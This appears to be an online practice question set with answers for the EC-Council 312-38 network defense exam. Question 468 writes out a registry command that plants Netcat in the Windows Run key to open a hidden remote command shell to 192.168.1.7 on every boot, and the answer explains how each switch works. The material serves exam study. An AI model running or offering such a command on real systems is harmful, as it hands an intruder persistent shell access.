EC-COUNCIL 312-38 Online Practice Questions and Exam Preparation

EC-COUNCIL 312-38 Online Questions & Answers

• Question 461:

  Fill in the blank with the appropriate file system. Alternate Data Streams (ADS) is a feature of the file system, allowing more than one data stream to be associated with a filename.

  NTFS

  Explanation/Reference:

  Alternate Data Streams (ADS) is a feature of the NTFS file system that allows more than one data stream to be associated with a filename, using the filename format "filename:streamname". Alternate streams are not listed in Windows Explorer, and their size is not included in the file size. ADS provides the hacker a place to hide root kits or hacker tools, which can be executed without being detected by the system administrator. Alternate Data Streams are strictly a feature of the NTFS file system. Alternate Data Streams may be used as a method of hiding executables or proprietary content.

• Question 462:

  You are using Wireshark to monitor your network traffic and you see a lot of packages with the FIN, PUSH and URG flags activated; what can you infer about this behavior?

  A. The Layer 3 Controls are activated in the Switches
  B. The Spanning Tree Protocol is activated in the Switches
  C. One NIC is broadcasting erroneous traffic
  D. An attacker is running a XMAS scan against the network
  D. An attacker is running a XMAS scan against the network

• Question 463:

  Which of the following statements best describes the consequences of a disaster recovery test?

  A. None
  B. The test results should be kept secret.
  C. If no deficiencies were found during the test, so the plan is probably perfect.
  D. If no deficiencies were found during the test, the test was probably erroneous.
  E. The plan should not change any of the test results would be.
  D. If no deficiencies were found during the test, the test was probably erroneous.

• Question 464:

  Peter, a malicious hacker obtains e-mail addresses by collecting them messages, blogs, DNS lists and Web pages. Then he will send a large number of unsolicited commercial e-mail (UCE) messages to these addresses. What Peter at the following e-mail committing crimes?

  A. E-Mail storm
  B. E-Mail bombing
  C. spam
  D. E-Mail scam
  E. None
  C. spam

• Question 465:

  How many layers are present in the OSI layer model?

  A. 5
  B. 4
  C. 7
  D. 9
  C. 7

• Question 466:

  If there is a fire incident caused by an electrical appliance short-circuit, which fire suppressant should be used to control it?

  A. Water
  B. Wet chemical
  C. Dry chemical
  D. Raw chemical
  C. Dry chemical

• Question 467:

  Sam, a network administrator, is using Wireshark to monitor the network traffic of the organization. He wants to detect TCP packets with no flag set to check for a specific attack attempt. Which filter will he use to view the traffic?

  A. tcp.flags==0x000
  B. tcp.flags==x0000
  C. tcp.flags==000x0
  D. tcp.flags==0000x
  A. tcp.flags==0x000

• Question 468:

  You run the following command on the remote Windows server 2003 computer:

  c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e

  cmd.exe"

  What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.

  A. You want to perform banner grabbing.
  B. You want to put Netcat in the stealth mode.
  C. You want to add the Netcat command to the Windows registry.
  D. You want to set the Netcat to execute command any time.
  B. You want to put Netcat in the stealth mode.
  C. You want to add the Netcat command to the Windows registry.
  D. You want to set the Netcat to execute command any time.

  ---

  Explanation/Reference:

  According to the question, you run the following command on the remote Windows server 2003 computer:

  c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e

  cmd.exe"

  By running this command, you want to perform the following tasks:

  Adding the NetCat command in the following registry value:

  HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  Putting the Netcat in the stealth mode by using the -d switch. Setting the Netcat tool to execute command at any time by using the -e switch. Answer option A is incorrect. You can perform banner grabbing by simply running the nc .

• Question 469:

  Which of the following tools examines a system for a number of known weaknesses and alerts the administrator?

  A. Nessus
  B. COPS
  C. SATAN
  D. SAINT
  B. COPS

• Question 470:

  Which of the following firewalls are used to track the state of active connections and determine the network packets allowed to enter through the firewall? Each correct answer represents a complete solution. Choose all that apply.

  A. Circuit-level gateway
  B. Stateful
  C. Proxy server
  D. Dynamic packet-filtering
  B. Stateful
  D. Dynamic packet-filtering

  ---

  Explanation/Reference:

  A dynamic packet-filtering firewall is a fourth generation firewall technology. It is also known as a stateful firewall. It tracks the state of active connections and determines which network packets are allowed to enter through the firewall. It records session information, such as IP addresses and port numbers to implement a more secure network. The dynamic packet-filtering firewall operates at Layer3, Layer4, and Layer5. Answer option A is incorrect. A circuit-level gateway is a type of firewall that works at the session layer of the OSI model between the application layer and the transport layer of the TCP/IP stack. They monitor TCP handshaking between packets to determine whether a requested session is legitimate. Information passed to a remote computer through a circuit level gateway appears to have originated from the gateway. This is useful for hiding information about protected networks. Circuit-level gateways are relatively inexpensive and have the advantage of hiding information about the private network they protect. Answer option C is incorrect. A proxy server firewall intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.